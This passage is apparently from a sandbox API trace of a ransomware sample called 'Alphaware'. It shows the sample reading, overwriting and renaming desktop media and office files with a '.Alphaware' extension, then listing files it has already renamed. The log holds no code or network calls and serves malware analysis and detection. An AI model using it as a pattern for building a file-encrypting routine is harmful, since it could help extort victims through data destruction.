hTemplateFile=0x0) returned 0x254 [0080.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.746] ReadFile (in: hFile=0x254, lpBuffer=0x2502358, nNumberOfBytesToRead=0x92f0, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2502358*, lpNumberOfBytesRead=0x23eb38*=0x92f0, lpOverlapped=0x0) returned 1 [0080.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.780] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.784] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0x8259d100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc4c8)) returned 1 [0080.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.784] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv.alphaware")) returned 1 [0080.785] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls", dwFileAttributes=0x80) returned 1 [0080.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls"), fInfoLevelId=0x0, lpFileInformation=0x25b70c8 | out: lpFileInformation=0x25b70c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0xff802ae0, ftLastWriteTime.dwHighDateTime=0x1d9750b, nFileSizeHigh=0x0, nFileSizeLow=0x67da)) returned 1 [0080.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.786] ReadFile (in: hFile=0x254, lpBuffer=0x25b7340, nNumberOfBytesToRead=0x67da, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25b7340*, lpNumberOfBytesRead=0x23eb38*=0x67da, lpOverlapped=0x0) returned 1 [0080.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.807] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.810] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0x825c3260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8b48)) returned 1 [0080.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.811] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\s4xZHJNmFEW_-to_l.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\s4xzhjnmfew_-to_l.xls.alphaware")) returned 1 [0080.811] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg", dwFileAttributes=0x80) returned 1 [0080.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.812] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg"), fInfoLevelId=0x0, lpFileInformation=0x267e3e0 | out: lpFileInformation=0x267e3e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x627aa2b0, ftLastWriteTime.dwHighDateTime=0x1d97002, nFileSizeHigh=0x0, nFileSizeLow=0xd49)) returned 1 [0080.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.812] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.814] ReadFile (in: hFile=0x254, lpBuffer=0x247bcc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x247bcc8*, lpNumberOfBytesRead=0x23eb38*=0xd49, lpOverlapped=0x0) returned 1 [0080.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.835] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x8260f520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288)) returned 1 [0080.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.838] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vjc3e20l.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\vjc3e20l.jpg.alphaware")) returned 1 [0080.838] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png", dwFileAttributes=0x80) returned 1 [0080.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.839] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png"), fInfoLevelId=0x0, lpFileInformation=0x25034a8 | out: lpFileInformation=0x25034a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0xc5a4d90, ftLastWriteTime.dwHighDateTime=0x1d97656, nFileSizeHigh=0x0, nFileSizeLow=0x126a6)) returned 1 [0080.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.839] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.839] ReadFile (in: hFile=0x254, lpBuffer=0x25036e0, nNumberOfBytesToRead=0x126a6, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25036e0*, lpNumberOfBytesRead=0x23eb38*=0x126a6, lpOverlapped=0x0) returned 1 [0080.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.863] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0x8265b7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x189b4)) returned 1 [0080.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.869] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Vxbet57tOqM.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\vxbet57toqm.png.alphaware")) returned 1 [0080.870] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3", dwFileAttributes=0x80) returned 1 [0080.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3"), fInfoLevelId=0x0, lpFileInformation=0x25caa48 | out: lpFileInformation=0x25caa48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x88683230, ftLastWriteTime.dwHighDateTime=0x1d97525, nFileSizeHigh=0x0, nFileSizeLow=0xc7d2)) returned 1 [0080.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.870] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.871] ReadFile (in: hFile=0x254, lpBuffer=0x25cacc0, nNumberOfBytesToRead=0xc7d2, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25cacc0*, lpNumberOfBytesRead=0x23eb38*=0xc7d2, lpOverlapped=0x0) returned 1 [0080.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.899] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x826a7aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10b48)) returned 1 [0080.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.906] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Wd6KHPvLn hvANgS.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\wd6khpvln hvangs.mp3.alphaware")) returned 1 [0080.907] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps", dwFileAttributes=0x80) returned 1 [0080.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.908] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps"), fInfoLevelId=0x0, lpFileInformation=0x267b720 | out: lpFileInformation=0x267b720*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0xd9cd9ba0, ftLastWriteTime.dwHighDateTime=0x1d96d42, nFileSizeHigh=0x0, nFileSizeLow=0x3b8c)) returned 1 [0080.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.908] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.908] ReadFile (in: hFile=0x254, lpBuffer=0x267b998, nNumberOfBytesToRead=0x3b8c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x267b998*, lpNumberOfBytesRead=0x23eb38*=0x3b8c, lpOverlapped=0x0) returned 1 [0080.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.935] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.940] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0x82719ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034)) returned 1 [0080.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.940] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\WQTdEEFonuZ7KxbDBX.pps.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\wqtdeefonuz7kxbdbx.pps.alphaware")) returned 1 [0080.941] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif", dwFileAttributes=0x80) returned 1 [0080.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif"), fInfoLevelId=0x0, lpFileInformation=0x2523f40 | out: lpFileInformation=0x2523f40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0xf3b0e690, ftLastWriteTime.dwHighDateTime=0x1d97313, nFileSizeHigh=0x0, nFileSizeLow=0x18881)) returned 1 [0080.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.941] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.942] ReadFile (in: hFile=0x254, lpBuffer=0x12efd580, nNumberOfBytesToRead=0x18881, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12efd580*, lpNumberOfBytesRead=0x23eb38*=0x18881, lpOverlapped=0x0) returned 1 [0080.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.965] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.972] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34)) returned 1 [0080.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.972] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\xfj_k_QyvZX0.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\xfj_k_qyvzx0.gif.alphaware")) returned 1 [0080.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0080.977] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82766180, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.977] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0x8145b180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc34, dwReserved0=0x0, dwReserved1=0x0, cFileName="1YPPAA.jpg.Alphaware", cAlternateFileName="1YPPAA~1.ALP")) returned 1 [0080.977] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x81bcb640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5DZrM2msfwaj.xls.Alphaware", cAlternateFileName="5DZRM2~1.ALP")) returned 1 [0080.977] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0x81d222a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6UV9xBZAU7ALhdXD5SwN.mp4.Alphaware", cAlternateFileName="6UV9XB~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x81dba820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18960, dwReserved0=0x0, dwReserved1=0x0, cFileName="6XFeOIrP-7F1BPJ.mp3.Alphaware", cAlternateFileName="6XFEOI~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x81e52da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x211c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8-6P.wav.Alphaware", cAlternateFileName="8-6PWA~1.ALP")) returned 1 [0080.978] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, 